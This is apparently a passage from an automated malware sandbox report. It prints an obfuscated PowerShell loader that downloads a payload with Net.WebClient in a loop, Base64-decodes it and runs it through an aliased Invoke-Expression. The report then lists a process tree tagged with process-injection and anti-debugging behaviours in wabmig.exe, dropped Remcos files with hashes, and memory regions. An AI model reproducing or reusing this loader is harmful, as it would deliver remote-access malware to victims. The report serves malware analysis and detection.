AntiSUn ufo tamir anim St aa& Plan& Brav BesveMul.vcUindshLak koSoaps De ritsynsr ';Gunnybag (Unmordant 'Scram$gravmgAg oslUnexpoKlinib Fl taSelvflWi,ne:BestiUSulfonPokomfSyg peNaifsiHerligKraalnStab e G.nndReroulSauroy nulp2Kerne4Refu 4wiwic= ordr( etcacVrkstmEnergdGalea su.pb/D armcDjvle agrot$S oroTCyklue.dsprlJenfreBilligforsor In raintermOp.qubBenziuUsa drDepo eTheoraForvauKn.wpeU forrDetersQuent) Defe ');Gunnybag (Unmordant 'lovme$ForplgInkublHenfroIndvibFriheaGtepalAfdel:SprogK tracuDikten GerlsTempetUpblonPac feb.aasrEpithiBinnysSalrekp.troe Ski,=Tilst$ anjaU JulenEfterdDvrgpevedlir rsspdPo ceu StudnPrevig ChemeUnge,dSlave.Tyfuss etrapKommulCusswi OevrtReolr( rbrn$BrndeDreviseTacklaApp mcDepretRrligi Turtv RekaaafbaatLoggai Uncho ryptnUd al) Ineb ');Gunnybag (Unmordant ' U de[OutroN SchaeAnerktStrai.Chro,SFl mmeDisser Str vPa,niiOffsicTore e stanPBrunkoShr kiPiv.tnelin.tTransMDrawkaramn.n kva aVandfgT nifeBolivrSqui ] Idio:Jager:ProreS Vam eAnme cSpha.u ,verr Im uiLen.tt.elleyso,ecP FablrIndfloF ndet .ontoUdspecKyllioO edilSau e Wacko= Dete Broma[ Tkn,N MaaleSkruetSmrb .KvaliS TudseStenkcTr ctu taverForstisossltMatriyUhaanPExceerm yapo Billt,bessoEsthecSerpeoFagjalLind Tun elySkibsptankeeSeism] ,aba:Klemm: ohavT dtralHallisCa he1Fjar 2fadde ');$Underdunged=$Kunstneriske[0];$Veterinrsygeplejerske= (Unmordant 'Kvrul$CaricG Bud LEmbarOK elhbBytteAOverfl axte:Staphako geL SafaLBrandiUnan.tLing t Ba eEOrnitR enneE Aa br hir= Au,inPersoECarpoW Sour-Traymocan.ibStodgjHomo.EForsyC emiotVel o Telefs Ans.yDeforsSleuttBurgleF gurMAddit.IberiNAfsnieDemoltGynos.Kont w IsabEsyltebHemaucPreh,lKnessiImpurED sgaNOptimt');$Veterinrsygeplejerske+=$Unfeignedly244[1];Gunnybag ($Veterinrsygeplejerske);Gunnybag (Unmordant 'Admir$ rchpA StenlNoledl Snebi napstStr.nt sgemeAbbozrMisspeDegrarDandi.PargeHIntoneThr caGteskd autoeT gltrlderps ont[Under$Ser iDMdelooSpytsvDorrseVersanAngussLandekaidfuaPaagrbUndereInitinDiact2nonnu3Charm]Far a=Mo.he$ PhylP Circs BriseUncaru pahidBal 
yoMethylRetsaoUovergAbsciiwurtzc Semia CoadlS rkllSkribyUltra ');$Beylics=Unmordant 'Gripp$SkabeA Tripl BusklOutw.iB hovtO gelt b rieRestyr SkrieNonb r,ooki.EpipsDtrombo Wafewregisn SoublQuartoLlbinaAl yod HummFAnechiDireklVi,eneKhane( way$BomulU skolnBiss,dDi igeLandfrLys rd ebyruF,erkn AborgC,teregenv d rdru,svrds$V kstTuanverBandsi utancReplahSstjeoLeflesSivebpVaciloProgrrArse a rintnIn isg For iH odoa F ctlHelio) Vurd ';$Trichosporangial=$Unfeignedly244[0];Gunnybag (Unmordant 'Whirt$.espoG ortblN.ncooBobinbBrandATurdalPopu :agaretPiazirCarobiFu iclpegasIStallT onarhHenvioZarebnYacht= S ff(Rip oTagt lePre eSBn,haTPytho-UnselP rgenAMajketantabhOdori Undel$SmallTejec RModskIDyfleCKvittHKardiO.radeSSt rmP,knheOE ulaRReve,ASpaann.agwogLegetiUdtryaspecilB obd)Ethno ');while (!$Trilithon) {Gunnybag (Unmordant 'Redni$YardfgFusiolPse doO erdbHjstaaIldlslB,eph:PostfCAbattlShealaReglawSk roeNonmadSonor= Avnb$I restOmdelr Jt euSt,eneMenis ') ;Gunnybag $Beylics;Gunnybag (Unmordant 'Tra hSFilabtSu etabrandr TilbtTor e-Kond.SNeg sludemie,aywoeR jeop Con. 
Homog4Mlket ');Gunnybag (Unmordant 'S.bro$ Diacg.arrilA ydooLetsibGendia.elstlscaff: unfeT ehavrGaleaiR acclC ingiSknditTuttehPh rmoBrashnAm.ia= Copy(Br nzT.phereTor msO ciat.rost-Ver.iPFisk aD mintReporhQuodl Indbe$M semTdu perAnglei Cli cDrog hAra,io UnassFatalpKarakoZeroarMasdea ritnV lgagFgtniiAttleaFremsl thew)Overs ') ;Gunnybag (Unmordant 'Za ar$Limm gOrganl utomoGastrbOphtha Aud lBr nd:OversEMik.omHiberiMod ag,yvaarTracka S.ignCranetRodnesHemps=Grupp$Ewtefg S atlAfearoAnsvabssteraHex plmntin:SrklaBTele.oBaarigPa risSilket LeasaUnplovmeinekOmsadoC,rbod SalaeTawnin.dmaasLumme+ Skyt+a tac% Lbet$HasteKRa eluNettonLegalsI tratRamshnRewade Dis rAsimeiProfesLychnkAktiee aad.Stor cVekslo redsuKabelnStikltAf if ') ;$Underdunged=$Kunstneriske[$Emigrants];}$Gsteforelse=305321;$Decahedron=28935;Gunnybag (Unmordant ' Nonn$StrejgHairll UgenoGrafibA,veraAnastlFresi:SvigeP SkderNikkeeS.perd oveiSinkncsquelaStarttFrostiGod.rntrykngBefa,9Witto7Misco Koiar=Nonfi HardeG .engeincubt Deco-SuburCPedalo revn coxptUdsmyeP obenForwetsnaps Speci$ MaleTTriplrBes riSovemc Dagph SmokoH,sitsGarg,pHeresoC efsrFluctaUdfalnSe ifgUnconiUnperaof.inlBartr ');Gunnybag (Unmordant 'Ser i$ InnagMrklalNu,syoDua.ibIcekha,rintlErsta:UnspeFBlikve AfvicTjrmokR.shifAnstiu PoodlHyphelpre.cyabern Inds= Fum. Skatt[ ChigSCognay ynsisSundht Ge heR,ssom.orfr.StampCPsycho Ef.en Nonev OpereUmorarKr.stt .nco]Kompa:Opsvu:BilbyFVaaberEntero izelmVindpBcha caCutbasGu tleUtero6Angos4ScorbStelegt tranrVrng iForeinUnd rgAktiv(Kybel$K,lniPVindtrHespeeFif idIndfaiArthrc Arbea,ornetTo,oniSimi.nRuf.egRef.i9Prism7Mohab)Biote ');Gunnybag (Unmordant 'Cho e$ParadgNonagl rigsoPeriobEkspoauroval gren: in kA AbjulBac skShippo arih reevoConvulHera lRettes Je skNonmyaCicerd Punte ustrtForn. Te,n=Aa ds u,pen[UsikkSKoketyTobaksPreb tPersyeVandfmGadab. 
loomTLsegle .losxAkastt Plan.Uni aERelatnNewshc Rem oKn,brdSammei TanknRumblg Turi]Vol.u:Vandl:LnstiAM.tasSBeskaCSaldoI ParlIInfla.OcreaGStrateHarmot HomoSDoktot Re rrSheriiMa.egnCloghgherma( Agra$arthrF liveeHabutc okskGrapef TrevuVituplMercilC gwaySekti)Hjmod ');Gunnybag (Unmordant 'budge$EberhgK.alil FienoGildabJunciaW ongl nder:.lectSChefko PdoffB ligacarrop DnieuNegridIsraee Hj pnsmede=Ordin$TypifAPolarl M ndkTremaoConvohU,gdooGodshlCoseyl UnstsOvertk R gsaTrifadStafeeOpsent onde. AbscsChoosu Campb Pap sSl eptsetter Jer iU.rign.ellig N,nl(Tilhy$Hes.eGBr nesMod tt abbieJudd flu,teo Dgnar Showe Rhodl TigesSkiv eTr ns,Windo$SundhDSensieSprogcStabiataniehTred.eMislidSilderP,onaoOffennpow e)Klere ');Gunnybag $Sofapuden;"
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • Network Service Discovery
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: CmdExeWriteProcessMemorySpam
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2744
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Indlaanet.Sor && echo t"
              5⤵
              • System Location Discovery: System Language Discovery
              PID:2608
            • C:\Program Files (x86)\windows mail\wabmig.exe
              "C:\Program Files (x86)\windows mail\wabmig.exe"
              5⤵
              • Suspicious use of NtCreateThreadExHideFromDebugger
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious use of SetWindowsHookEx
              PID:1700

    Network

    MITRE ATT&CK Enterprise v15

    Downloads

    • C:\ProgramData\remcos\logs.dat

      Filesize

      144B

      MD5

      f9cfe51fabf951c2785a76518d1bf21e

      SHA1

      80b7a676c9a0a8c6fc9b62e926268ca98ba45d81

      SHA256

      fefbf7f5be88149baa11b22abffb9aad1789c7c4047e880663888a28afb252fc

      SHA512

      3641e155083c7e237a5ec25cbfb128f12661588ca8b5db35a49cd4e0b8baea991b41f232ac4ec67982fae7a9d8abc2d79370ef3c5ef03112faa0cbfff3ed9b3f

    • C:\Users\Admin\AppData\Roaming\Indlaanet.Sor

      Filesize

      435KB

      MD5

      d1d94e8b3529057db3dc0cbe4e6f616a

      SHA1

      a4dd4b336557a88d2e165cd6f7aab679095efc33

      SHA256

      c19e7f8bf24326c8eda4569400e723dace3753f4edab2577f89b70585664cb15

      SHA512

      06460dd08693c88daab40c9c9621a1c85b7e07408e34e02bd01d8989b14dcf1caf082a8c58889bc131b97929c938fce63d87f64de08e5e0be256b2d97148ce6c

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ZLGT9152EGDQBGN6LPGA.temp

      Filesize

      7KB

      MD5

      f6205fa82e863d0b1b847550b486bfa8

      SHA1

      20fd616512ed89538cf82d9d64dc373208baba4e

      SHA256

      f185dde72b2eac05172548566641c2a20c519130ea4215cf51820957a79a19b4

      SHA512

      4f6f48f6166d730171068036ed6363820ef1a88613b33d42d03fd65ddced5ffcbfab52e258ca415c5a7703695243f7971ab0ac85367476947d96a0daad326bb9

    • memory/1700-41-0x0000000001C40000-0x0000000004E45000-memory.dmp

      Filesize

      50.0MB

    • memory/1700-21-0x0000000000BD0000-0x0000000001C32000-memory.dmp

      Filesize

      16.4MB

    • memory/1700-19-0x0000000001C40000-0x0000000004E45000-memory.dmp

      Filesize

      50.0MB

    • memory/2372-8-0x000007FEF5A70000-0x000007FEF640D000-memory.dmp

      Filesize

      9.6MB

    • memory/2372-12-0x000007FEF5A70000-0x000007FEF640D000-memory.dmp

      Filesize

      9.6MB

    • memory/2372-13-0x000007FEF5D2E000-0x000007FEF5D2F000-memory.dmp

      Filesize

      4KB

    • memory/2372-10-0x000007FEF5A70000-0x000007FEF640D000-memory.dmp

      Filesize

      9.6MB

    • memory/2372-9-0x000007FEF5A70000-0x000007FEF640D000-memory.dmp

      Filesize

      9.6MB

    • memory/2372-4-0x000007FEF5D2E000-0x000007FEF5D2F000-memory.dmp

      Filesize

      4KB

    • memory/2372-5-0x000000001B690000-0x000000001B972000-memory.dmp

      Filesize

      2.9MB

    • memory/2372-6-0x0000000002810000-0x0000000002818000-memory.dmp

      Filesize

      32KB

    • memory/2372-42-0x000007FEF5A70000-0x000007FEF640D000-memory.dmp

      Filesize

      9.6MB

    • memory/2372-7-0x000007FEF5A70000-0x000007FEF640D000-memory.dmp

      Filesize

      9.6MB

    • memory/2744-18-0x00000000065F0000-0x00000000097F5000-memory.dmp

      Filesize

      50.0MB